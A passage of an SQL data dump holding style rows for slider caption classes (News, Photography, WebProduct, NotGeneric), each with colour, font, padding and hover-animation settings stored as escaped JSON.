(70,'.tp-caption.News-Subtitle','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.65\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"0px\",\"border-radius\":[\"0\",\"0\",\"0px\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"300\",\"easing\":\"power3.inOut\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"24px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Roboto Slab\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(71,'.tp-caption.Photography-Display','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"5px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"80px\",\"line-height\":\"70px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(72,'.tp-caption.Photography-Subline','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#777777\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(73,'.tp-caption.Photography-ImageHover','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"0.5\",\"scalex\":\"0.8\",\"scaley\":\"0.8\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"1000\",\"easing\":\"power3.inOut\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20\",\"line-height\":\"22\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(74,'.tp-caption.Photography-Menuitem','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#00ffde\",\"background-transparency\":\"0.65\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"200\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"3px\",\"5px\",\"3px\",\"8px\"],\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0.65\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(75,'.tp-caption.Photography-Textblock','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(76,'.tp-caption.Photography-Subline-2','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.35\",\"font-size\":\"20px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(77,'.tp-caption.Photography-ImageHover2','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"0.5\",\"scalex\":\"0.8\",\"scaley\":\"0.8\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"500\",\"easing\":\"back.out\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20\",\"line-height\":\"22\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Arial\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(78,'.tp-caption.WebProduct-Title','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#333333\",\"color-transparency\":\"1\",\"font-size\":\"90px\",\"line-height\":\"90px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(79,'.tp-caption.WebProduct-SubTitle','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#999999\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(80,'.tp-caption.WebProduct-Content','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#999999\",\"color-transparency\":\"1\",\"font-size\":\"16px\",\"line-height\":\"24px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(81,'.tp-caption.WebProduct-Menuitem','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#999999\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"200\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"3px\",\"5px\",\"3px\",\"8px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#333333\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(82,'.tp-caption.WebProduct-Title-Light','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"90px\",\"line-height\":\"90px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(83,'.tp-caption.WebProduct-SubTitle-Light','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.35\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"parallax\":\"-\"}'),
(84,'.tp-caption.WebProduct-Content-Light','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.65\",\"font-size\":\"16px\",\"line-height\":\"24px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"parallax\":\"-\"}'),
(85,'.tp-caption.FatRounded','{\"hover\":\"true\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#d3d3d3\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"50px\",\"50px\",\"50px\",\"50px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"20px\",\"22px\",\"20px\",\"25px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0.5\",\"border-color\":\"#d3d3d3\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"50px\",\"50px\",\"50px\",\"50px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(86,'.tp-caption.NotGeneric-Title','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"[object Object]\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"70px\",\"line-height\":\"70px\",\"font-weight\":\"800\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"10px 0px 10px 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(87,'.tp-caption.NotGeneric-SubTitle','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"4px\",\"text-align\":\"left\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"13px\",\"line-height\":\"20px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
